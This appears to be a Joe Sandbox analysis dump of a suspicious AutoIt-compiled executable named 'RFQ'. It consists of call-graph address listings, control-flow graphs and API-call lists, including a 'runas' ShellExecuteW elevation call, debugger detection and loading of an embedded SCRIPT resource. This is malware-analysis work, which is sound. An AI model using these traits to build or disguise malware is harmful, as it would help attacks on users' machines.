Mailbox 95871->95917 95872 73f595 95879 73d7f7 48 API calls 95872->95879 95872->95917 95874 7a8728 95873->95874 95874->95877 96039 77cc5c 86 API calls 4 library calls 95874->96039 96042 77cc5c 86 API calls 4 library calls 95875->96042 95877->95871 95877->95872 95880 73d7f7 48 API calls 95877->95880 95918 73f229 95877->95918 95881 7a87a3 95879->95881 95882 7a8772 95880->95882 96041 750f0a 52 API calls __cinit 95881->96041 96040 750f0a 52 API calls __cinit 95882->96040 95914 73f418 95884->95914 96043 779af1 48 API calls 95884->96043 95885 7a8b1b 95896 7a8bcf 95885->95896 95897 7a8b2c 95885->95897 95887 73d6e9 55 API calls 95887->95917 95889 73f770 95892 7a8a45 95889->95892 95911 73f77a 95889->95911 95890 77cc5c 86 API calls 95890->95917 95891 7a8b7e 96052 78e40a 346 API calls Mailbox 95891->96052 96049 74c1af 48 API calls 95892->96049 95893 7a8c53 96057 77cc5c 86 API calls 4 library calls 95893->96057 95894 7a8810 96044 78eef8 346 API calls 95894->96044 95895 73fe30 346 API calls 95915 73f6aa 95895->95915 96054 77cc5c 86 API calls 4 library calls 95896->96054 96051 78f5ee 346 API calls 95897->96051 95898 7a8beb 96055 78bdbd 346 API calls Mailbox 95898->96055 95900 73fe30 346 API calls 95900->95917 95905 73f537 Mailbox 95905->95087 95907 741b90 48 API calls 95907->95917 95910 741b90 48 API calls 95910->95917 95911->95907 95912 7a8c00 95912->95905 96056 77cc5c 86 API calls 4 library calls 95912->96056 95913 7a8823 95913->95914 95922 7a884b 95913->95922 95914->95885 95914->95915 95914->95917 95915->95889 95915->95895 95915->95905 95916 73fce0 95915->95916 95915->95917 95916->95905 96053 77cc5c 86 API calls 4 library calls 95916->96053 95917->95887 95917->95890 95917->95891 95917->95893 95917->95898 95917->95900 95917->95905 95917->95910 95917->95916 96038 73dd47 48 API calls _memcpy_s 95917->96038 96050 7697ed InterlockedDecrement 95917->96050 96058 74c1af 48 API calls 95917->96058 95918->95871 95918->95872 95918->95914 95918->95917 96045 78ccdc 48 API calls 95922->96045 95924 7a8857 95926 7a8865 95924->95926 95927 7a88aa 95924->95927 96046 779b72 48 API calls 95926->96046 95930 7a88a0 Mailbox 95927->95930 96047 77a69d 48 API calls 95927->96047 95928 73fe30 346 API calls 95928->95905 95930->95928 95932 7a88e7 96048 73bc74 48 API calls 95932->96048 95935 744637 95934->95935 95936 74479f 95934->95936 95938 744643 95935->95938 95939 7a6e05 95935->95939 95937 73ce19 48 API calls 95936->95937 95946 7446e4 Mailbox 95937->95946 96059 744300 95938->96059 96121 78e822 346 API calls Mailbox 95939->96121 95942 744739 Mailbox 95942->95087 95943 7a6e11 95943->95942 96122 77cc5c 86 API calls 4 library calls 95943->96122 95945 744659 95945->95942 95945->95943 95945->95946 95947 790d09 129 API calls 95946->95947 96074 776524 95946->96074 96077 77fa0c 95946->96077 96118 790d1d 95946->96118 95947->95942 95951->95087 96230 73bd30 95952->96230 95954 743267 95955 7a907a 95954->95955 95956 7432f8 95954->95956 96022 743628 95954->96022 96247 77cc5c 86 API calls 4 library calls 95955->96247 96242 74c36b 86 API calls 95956->96242 95960 7a94df 95960->96022 96263 77cc5c 86 API calls 4 library calls 95960->96263 95962 743313 95962->95960 95989 7434eb _memcpy_s Mailbox 95962->95989 95962->96022 96235 732b7a 95962->96235 95966 7a926d 96256 77cc5c 86 API calls 4 library calls 95966->96256 95967 7a909a 95969 73d645 53 API calls 95967->95969 96009 7a91fa 95967->96009 95968 73fe30 346 API calls 95971 7a9407 95968->95971 95972 7a910c 95969->95972 95981 73d6e9 55 API calls 95971->95981 95971->96022 95975 7a9220 95972->95975 95976 7a9114 95972->95976 95973 7433ce 95978 743465 95973->95978 95979 7a945e 95973->95979 95973->95989 96253 731caa 49 API calls 95975->96253 95988 7a9128 95976->95988 95998 7a9152 95976->95998 95977 73d764 55 API calls 95977->95989 95984 74f4ea 48 API calls 95978->95984 96261 77c942 50 API calls 95979->96261 95980 73d9a0 53 API calls 95980->95989 95985 7a9438 95981->95985 96004 74346c 95984->96004 96260 77cc5c 86 API calls 4 library calls 95985->96260 95986 7a923d 95992 7a925e 95986->95992 95993 7a9252 95986->95993 95987 73fe30 346 API calls 95987->95989 96248 77cc5c 86 API calls 4 library calls 95988->96248 95989->95966 95989->95967 95989->95977 95989->95980 95989->95985 95989->95987 95991 74c3c3 48 API calls 95989->95991 96007 74f4ea 48 API calls 95989->96007 96010 74351f 95989->96010 96012 7a9394 95989->96012 96016 7a93c5 95989->96016 95989->96022 96244 73d8c0 53 API calls 95989->96244 96245 74c2d6 48 API calls _memcpy_s 95989->96245 96257 78cda2 82 API calls Mailbox 95989->96257 96258 7780e3 53 API calls 95989->96258 96259 73dcae 50 API calls Mailbox 95989->96259 95991->95989 96255 77cc5c 86 API calls 4 library calls 95992->96255 96254 77cc5c 86 API calls 4 library calls 95993->96254 95999 7a9177 95998->95999 96002 7a9195 95998->96002 96249 78f320 346 API calls 95999->96249 96003 7a918b 96002->96003 96250 78f5ee 346 API calls 96002->96250 96003->96022 96251 74c2d6 48 API calls _memcpy_s 96003->96251 96006 73e8d0 346 API calls 96004->96006 96004->96010 96006->95989 96007->95989 96252 77cc5c 86 API calls 4 library calls 96009->96252 96011 736eed 48 API calls 96010->96011 96013 743540 96010->96013 96011->96013 96014 74f4ea 48 API calls 96012->96014 96017 7a94b0 96013->96017 96020 743585 96013->96020 96013->96022 96014->96016 96016->95968 96262 73dcae 50 API calls Mailbox 96017->96262 96019 743615 96243 73dcae 50 API calls Mailbox 96019->96243 96020->95960 96020->96019 96020->96022 96023 743635 Mailbox 96022->96023 96246 77cc5c 86 API calls 4 library calls 96022->96246 96023->95087 96024->95087 96025->95087 96026->95031 96027->95035 96028->95040 96029->95087 96030->95087 96031->95083 96032->95083 96033->95083 96034->95083 96035->95083 96036->95083 96037->95868 96038->95917 96039->95877 96040->95918 96041->95917 96042->95905 96043->95894 96044->95913 96045->95924 96046->95930 96047->95932 96048->95930 96049->95917 96050->95917 96051->95917 96052->95916 96053->95905 96054->95905 96055->95912 96056->95905 96057->95905 96058->95917 96060 7a6e60 96059->96060 96063 74432c 96059->96063 96124 77cc5c 86 API calls 4 library calls 96060->96124 96062 7a6e71 96125 77cc5c 86 API calls 4 library calls 96062->96125 96063->96062 96070 744366 _memcpy_s 96063->96070 96065 744435 96071 744445 96065->96071 96123 78cda2 82 API calls Mailbox 96065->96123 96066 74f4ea 48 API calls 96066->96070 96068 7444b1 96068->95945 96069 73fe30 346 API calls 96069->96070 96070->96065 96070->96066 96070->96069 96070->96071 96072 7a6ebd 96070->96072 96071->95945 96126 77cc5c 86 API calls 4 library calls 96072->96126 96127 776ca9 GetFileAttributesW 96074->96127 96078 77fa1c __ftell_nolock 96077->96078 96079 77fa44 96078->96079 96192 73d286 48 API calls 96078->96192 96081 73936c 81 API calls 96079->96081 96082 77fa5e 96081->96082 96083 77fa80 96082->96083 96084 77fb68 96082->96084 96094 77fb92 96082->96094 96085 73936c 81 API calls 96083->96085 96086 7341a9 136 API calls 96084->96086 96092 77fa8c _wcscpy _wcschr 96085->96092 96087 77fb79 96086->96087 96088 77fb8e 96087->96088 96090 7341a9 136 API calls 96087->96090 96089 73936c 81 API calls 96088->96089 96088->96094 96091 77fbc7 96089->96091 96090->96088 96093 751dfc __wsplitpath 47 API calls 96091->96093 96097 77fab0 _wcscat _wcscpy 96092->96097 96100 77fade _wcscat 96092->96100 96102 77fbeb _wcscat _wcscpy 96093->96102 96094->95942 96095 73936c 81 API calls 96096 77fafc _wcscpy 96095->96096 96193 7772cb GetFileAttributesW 96096->96193 96098 73936c 81 API calls 96097->96098 96098->96100 96100->96095 96101 77fb1c __wsetenvp 96101->96094 96103 73936c 81 API calls 96101->96103 96106 73936c 81 API calls 96102->96106 96104 77fb48 96103->96104 96194 7760dd 77 API calls 4 library calls 96104->96194 96108 77fc82 96106->96108 96107 77fb5c 96107->96094 96131 77690b 96108->96131 96110 77fca2 96111 776524 3 API calls 96110->96111 96112 77fcb1 96111->96112 96113 73936c 81 API calls 96112->96113 96116 77fce2 96112->96116 96114 77fccb 96113->96114 96137 77bfa4 96114->96137 96117 734252 84 API calls 96116->96117 96117->96094 96119 78f8ae 129 API calls 96118->96119 96120 790d2d 96119->96120 96120->95942 96121->95943 96122->95942 96123->96068 96124->96062 96125->96071 96126->96071 96128 776529 96127->96128 96129 776cc4 FindFirstFileW 96127->96129 96128->95942 96129->96128 96130 776cd9 FindClose 96129->96130 96130->96128 96132 776918 _wcschr __ftell_nolock 96131->96132 96133 751dfc __wsplitpath 47 API calls 96132->96133 96136 77692e _wcscat _wcscpy 96132->96136 96134 77695d 96133->96134 96135 751dfc __wsplitpath 47 API calls 96134->96135 96135->96136 96136->96110 96138 77bfb1 __ftell_nolock 96137->96138 96139 74f4ea 48 API calls 96138->96139 96140 77c00e 96139->96140 96141 7347b7 48 API calls 96140->96141 96142 77c018 96141->96142 96143 77bdb4 GetSystemTimeAsFileTime 96142->96143 96144 77c023 96143->96144 96145 734517 83 API calls 96144->96145 96146 77c036 _wcscmp 96145->96146 96147 77c107 96146->96147 96148 77c05a 96146->96148 96149 77c56d 94 API calls 96147->96149 96150 77c56d 94 API calls 96148->96150 96165 77c0d3 _wcscat 96149->96165 96151 77c05f 96150->96151 96152 751dfc __wsplitpath 47 API calls 96151->96152 96155 77c110 96151->96155 96157 77c088 _wcscat _wcscpy 96152->96157 96153 7344ed 64 API calls 96154 77c12c 96153->96154 96156 7344ed 64 API calls 96154->96156 96155->96116 96158 77c13c 96156->96158 96160 751dfc __wsplitpath 47 API calls 96157->96160 96159 7344ed 64 API calls 96158->96159 96161 77c157 96159->96161 96160->96165 96162 7344ed 64 API calls 96161->96162 96163 77c167 96162->96163 96164 7344ed 64 API calls 96163->96164 96166 77c182 96164->96166 96165->96153 96165->96155 96167 7344ed 64 API calls 96166->96167 96168 77c192 96167->96168 96169 7344ed 64 API calls 96168->96169 96170 77c1a2 96169->96170 96171 7344ed 64 API calls 96170->96171 96172 77c1b2 96171->96172 96195 77c71a GetTempPathW GetTempFileNameW 96172->96195 96174 77c1be 96175 753499 117 API calls 96174->96175 96186 77c1cf 96175->96186 96176 77c289 96177 7535e4 __fcloseall 83 API calls 96176->96177 96178 77c294 96177->96178 96179 7344ed 64 API calls 96179->96186 96186->96155 96186->96176 96186->96179 96196 752aae 96186->96196 96192->96079 96193->96101 96194->96107 96195->96174 96197 752aba __tzset_nolock 96196->96197 96231 73bd3f 96230->96231 96234 73bd5a 96230->96234 96232 73bdfa 48 API calls 96231->96232 96233 73bd47 CharUpperBuffW 96232->96233 96233->96234 96234->95954 96236 7a436a 96235->96236 96237 732b8b 96235->96237 96238 74f4ea 48 API calls 96237->96238 96239 732b92 96238->96239 96240 732bb3 96239->96240 96264 732bce 48 API calls 96239->96264 96240->95973 96242->95962 96243->96022 96244->95989 96245->95989 96246->96023 96247->95962 96248->96022 96249->96003 96250->96003 96251->96009 96252->96022 96253->95986 96254->96022 96255->96022 96256->96022 96257->95989 96258->95989 96259->95989 96260->96022 96261->96010 96262->95960 96263->96022 96264->96240 96265 7a9c06 96276 74d3be 96265->96276 96267 7a9c1c 96268 7a9c91 Mailbox 96267->96268 96285 731caa 49 API calls 96267->96285 96271 743200 346 API calls 96268->96271 96270 7a9c71 96273 7a9cc5 96270->96273 96286 77b171 48 API calls 96270->96286 96271->96273 96274 7aa7ab Mailbox 96273->96274 96287 77cc5c 86 API calls 4 library calls 96273->96287 96277 74d3dc 96276->96277 96278 74d3ca 96276->96278 96280 74d3e2 96277->96280 96281 74d40b 96277->96281 96288 73dcae 50 API calls Mailbox 96278->96288 96282 74f4ea 48 API calls 96280->96282 96289 73dcae 50 API calls Mailbox 96281->96289 96284 74d3d4 96282->96284 96284->96267 96285->96270 96286->96268 96287->96274 96288->96284 96289->96284

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0075B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 643 75b043-75b080 call 75f8a0 646 75b082-75b084 643->646 647 75b089-75b08b 643->647 648 75b860-75b86c call 75a70c 646->648 649 75b08d-75b0a7 call 757bda call 757c0e call 756e10 647->649 650 75b0ac-75b0d9 647->650 649->648 653 75b0e0-75b0e7 650->653 654 75b0db-75b0de 650->654 658 75b105 653->658 659 75b0e9-75b100 call 757bda call 757c0e call 756e10 653->659 654->653 657 75b10b-75b110 654->657 662 75b112-75b11c call 75f82f 657->662 663 75b11f-75b12d call 763bf2 657->663 658->657 689 75b851-75b854 659->689 662->663 674 75b133-75b145 663->674 675 75b44b-75b45d 663->675 674->675 679 75b14b-75b183 call 757a0d GetConsoleMode 674->679 676 75b463-75b473 675->676 677 75b7b8-75b7d5 WriteFile 675->677 681 75b479-75b484 676->681 682 75b55a-75b55f 676->682 684 75b7d7-75b7df 677->684 685 75b7e1-75b7e7 GetLastError 677->685 679->675 694 75b189-75b18f 679->694 687 75b81b-75b833 681->687 688 75b48a-75b49a 681->688 691 75b565-75b56e 682->691 692 75b663-75b66e 682->692 690 75b7e9 684->690 685->690 696 75b835-75b838 687->696 697 75b83e-75b84e call 757c0e call 757bda 687->697 695 75b4a0-75b4a3 688->695 693 75b85e-75b85f 689->693 699 75b7ef-75b7f1 690->699 691->687 700 75b574 691->700 692->687 698 75b674 692->698 693->648 701 75b191-75b193 694->701 702 75b199-75b1bc GetConsoleCP 694->702 703 75b4a5-75b4be 695->703 704 75b4e9-75b520 WriteFile 695->704 696->697 705 75b83a-75b83c 696->705 697->689 706 75b67e-75b693 698->706 708 75b856-75b85c 699->708 709 75b7f3-75b7f5 699->709 710 75b57e-75b595 700->710 701->675 701->702 712 75b440-75b446 702->712 713 75b1c2-75b1ca 702->713 714 75b4c0-75b4ca 703->714 715 75b4cb-75b4e7 703->715 704->685 716 75b526-75b538 704->716 705->693 717 75b699-75b69b 706->717 708->693 709->687 719 75b7f7-75b7fc 709->719 711 75b59b-75b59e 710->711 720 75b5a0-75b5b6 711->720 721 75b5de-75b627 WriteFile 711->721 712->709 722 75b1d4-75b1d6 713->722 714->715 715->695 715->704 716->699 723 75b53e-75b54f 716->723 724 75b69d-75b6b3 717->724 725 75b6d8-75b719 WideCharToMultiByte 717->725 727 75b812-75b819 call 757bed 719->727 728 75b7fe-75b810 call 757c0e call 757bda 719->728 731 75b5cd-75b5dc 720->731 732 75b5b8-75b5ca 720->732 721->685 733 75b62d-75b645 721->733 735 75b1dc-75b1fe 722->735 736 75b36b-75b36e 722->736 723->688 737 75b555 723->737 738 75b6b5-75b6c4 724->738 739 75b6c7-75b6d6 724->739 725->685 729 75b71f-75b721 725->729 727->689 728->689 741 75b727-75b75a WriteFile 729->741 731->711 731->721 732->731 733->699 743 75b64b-75b658 733->743 745 75b217-75b223 call 751688 735->745 746 75b200-75b215 735->746 747 75b375-75b3a2 736->747 748 75b370-75b373 736->748 737->699 738->739 739->717 739->725 750 75b75c-75b776 741->750 751 75b77a-75b78e GetLastError 741->751 743->710 753 75b65e 743->753 767 75b225-75b239 745->767 768 75b269-75b26b 745->768 754 75b271-75b283 call 7640f7 746->754 749 75b3a8-75b3ab 747->749 748->747 748->749 756 75b3b2-75b3c5 call 765884 749->756 757 75b3ad-75b3b0 749->757 750->741 758 75b778 750->758 761 75b794-75b796 751->761 753->699 770 75b435-75b43b 754->770 771 75b289 754->771 756->685 776 75b3cb-75b3d5 756->776 757->756 763 75b407-75b40a 757->763 758->761 761->690 766 75b798-75b7b0 761->766 763->722 773 75b410 763->773 766->706 772 75b7b6 766->772 774 75b412-75b42d 767->774 775 75b23f-75b254 call 7640f7 767->775 768->754 770->690 777 75b28f-75b2c4 WideCharToMultiByte 771->777 772->699 773->770 774->770 775->770 783 75b25a-75b267 775->783 779 75b3d7-75b3ee call 765884 776->779 780 75b3fb-75b401 776->780 777->770 781 75b2ca-75b2f0 WriteFile 777->781 779->685 788 75b3f4-75b3f5 779->788 780->763 781->685 785 75b2f6-75b30e 781->785 783->777 785->770 787 75b314-75b31b 785->787 787->780 789 75b321-75b34c WriteFile 787->789 788->780 789->685 790 75b352-75b359 789->790 790->770 791 75b35f-75b366 790->791 791->780
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 414e070471a0c3e4b51d18f604061e06f68f4c1aeb2fbc89d431554db446401c
                                                                                                                                                    • Instruction ID: ebf99d8c0d6f378b4796928b023b40d9f0298868db57bd0c399b7cc5149c50ed
                                                                                                                                                    • Opcode Fuzzy Hash: 414e070471a0c3e4b51d18f604061e06f68f4c1aeb2fbc89d431554db446401c
                                                                                                                                                    • Instruction Fuzzy Hash: 23328075B022188FCB24CF14DC856E9B7B5FF4A311F1841D9E80AA7A81D7789E84CF92
                                                                                                                                                    Function 00733D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00733AA3,?), ref: 00733D45
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00733AA3,?), ref: 00733D57
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007F1148,007F1130,?,?,?,?,00733AA3,?), ref: 00733DC8
                                                                                                                                                      • Part of subcall function 00736430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733DEE,007F1148,?,?,?,?,?,00733AA3,?), ref: 00736471
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00733AA3,?), ref: 00733E48
                                                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007E28F4,00000010), ref: 007A1CCE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,007F1148,?,?,?,?,?,00733AA3,?), ref: 007A1D06
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007CDAB4,007F1148,?,?,?,?,?,00733AA3,?), ref: 007A1D89
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00733AA3), ref: 007A1D90
                                                                                                                                                      • Part of subcall function 00733E6E: GetSysColorBrush.USER32(0000000F), ref: 00733E79
                                                                                                                                                      • Part of subcall function 00733E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00733E88
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(00000063), ref: 00733E9E
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(000000A4), ref: 00733EB0
                                                                                                                                                      • Part of subcall function 00733E6E: LoadIconW.USER32(000000A2), ref: 00733EC2
                                                                                                                                                      • Part of subcall function 00733E6E: RegisterClassExW.USER32(?), ref: 00733F30
                                                                                                                                                      • Part of subcall function 007336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007336E6
                                                                                                                                                      • Part of subcall function 007336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733707
                                                                                                                                                      • Part of subcall function 007336B8: ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 0073371B
                                                                                                                                                      • Part of subcall function 007336B8: ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 00733724
                                                                                                                                                      • Part of subcall function 00734FFC: _memset.LIBCMT ref: 00735022
                                                                                                                                                      • Part of subcall function 00734FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007350CB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                    • String ID: ()~$This is a third-party compiled AutoIt script.$runas
                                                                                                                                                    • API String ID: 438480954-284739447
                                                                                                                                                    • Opcode ID: fdbe6b19c6a018316dc3ca8ac048c0a7f12f17fbf62f8d21efdd733759665f6a
                                                                                                                                                    • Instruction ID: a01b79f278746d50b5430b5d2606afcd84b83c5f97d5832cf339c97db59e72b1
                                                                                                                                                    • Opcode Fuzzy Hash: fdbe6b19c6a018316dc3ca8ac048c0a7f12f17fbf62f8d21efdd733759665f6a
                                                                                                                                                    • Instruction Fuzzy Hash: 82510531A4424CEAEB21EBB1DC49EFE7B799B15700F408164F641A31A3DA7C4A05CB25
                                                                                                                                                    Function 0074DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1075 74ddc0-74de4f call 73d7f7 GetVersionExW call 736a63 call 74dfb4 call 736571 1084 74de55-74de56 1075->1084 1085 7a24c8-7a24cb 1075->1085 1086 74de92-74dea2 call 74df77 1084->1086 1087 74de58-74de63 1084->1087 1088 7a24cd 1085->1088 1089 7a24e4-7a24e8 1085->1089 1106 74dea4-74dec1 GetCurrentProcess call 74df5f 1086->1106 1107 74dec7-74dee1 1086->1107 1092 7a244e-7a2454 1087->1092 1093 74de69-74de6b 1087->1093 1095 7a24d0 1088->1095 1090 7a24ea-7a24f3 1089->1090 1091 7a24d3-7a24dc 1089->1091 1090->1095 1098 7a24f5-7a24f8 1090->1098 1091->1089 1096 7a245e-7a2464 1092->1096 1097 7a2456-7a2459 1092->1097 1099 7a2469-7a2475 1093->1099 1100 74de71-74de74 1093->1100 1095->1091 1096->1086 1097->1086 1098->1091 1102 7a247f-7a2485 1099->1102 1103 7a2477-7a247a 1099->1103 1104 74de7a-74de89 1100->1104 1105 7a2495-7a2498 1100->1105 1102->1086 1103->1086 1110 7a248a-7a2490 1104->1110 1111 74de8f 1104->1111 1105->1086 1112 7a249e-7a24b3 1105->1112 1106->1107 1125 74dec3 1106->1125 1108 74df31-74df3b GetSystemInfo 1107->1108 1109 74dee3-74def7 call 74e00c 1107->1109 1118 74df0e-74df1a 1108->1118 1122 74df29-74df2f GetSystemInfo 1109->1122 1123 74def9-74df01 call 74dff4 GetNativeSystemInfo 1109->1123 1110->1086 1111->1086 1115 7a24bd-7a24c3 1112->1115 1116 7a24b5-7a24b8 1112->1116 1115->1086 1116->1086 1120 74df21-74df26 1118->1120 1121 74df1c-74df1f FreeLibrary 1118->1121 1121->1120 1127 74df03-74df07 1122->1127 1123->1127 1125->1107 1127->1118 1129 74df09-74df0c FreeLibrary 1127->1129 1129->1118
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0074DDEC
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,007CDC38,?,?), ref: 0074DEAC
                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,007CDC38,?,?), ref: 0074DF01
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0074DF0C
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0074DF1F
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,007CDC38,?,?), ref: 0074DF29
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,007CDC38,?,?), ref: 0074DF35
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3851250370-0
                                                                                                                                                    • Opcode ID: d47fbb2a07d4057d89cc8d1086a80a232cacecfdc4b25fe6b1bfcfd7d7c40e44
                                                                                                                                                    • Instruction ID: 356c89ff7dbc9c4809f47019fb970d6cc6326c9b31b60dac6ab397c5360e61e5
                                                                                                                                                    • Opcode Fuzzy Hash: d47fbb2a07d4057d89cc8d1086a80a232cacecfdc4b25fe6b1bfcfd7d7c40e44
                                                                                                                                                    • Instruction Fuzzy Hash: 7E61AFB180A2D4DBCF25CF6898C45E97FB46F6A300B1989D9D8859F207D728CD09CB66
                                                                                                                                                    Function 0073406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1147 73406b-734083 CreateStreamOnHGlobal 1148 7340a3-7340a6 1147->1148 1149 734085-73409c FindResourceExW 1147->1149 1150 7340a2 1149->1150 1151 7a4f16-7a4f25 LoadResource 1149->1151 1150->1148 1151->1150 1152 7a4f2b-7a4f39 SizeofResource 1151->1152 1152->1150 1153 7a4f3f-7a4f4a LockResource 1152->1153 1153->1150 1154 7a4f50-7a4f6e 1153->1154 1154->1150
                                                                                                                                                    APIs
                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0073449E,?,?,00000000,00000001), ref: 0073407B
                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0073449E,?,?,00000000,00000001), ref: 00734092
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB), ref: 007A4F1A
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB), ref: 007A4F2F
                                                                                                                                                    • LockResource.KERNEL32(0073449E,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB,00000000), ref: 007A4F42
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                    • String ID: SCRIPT
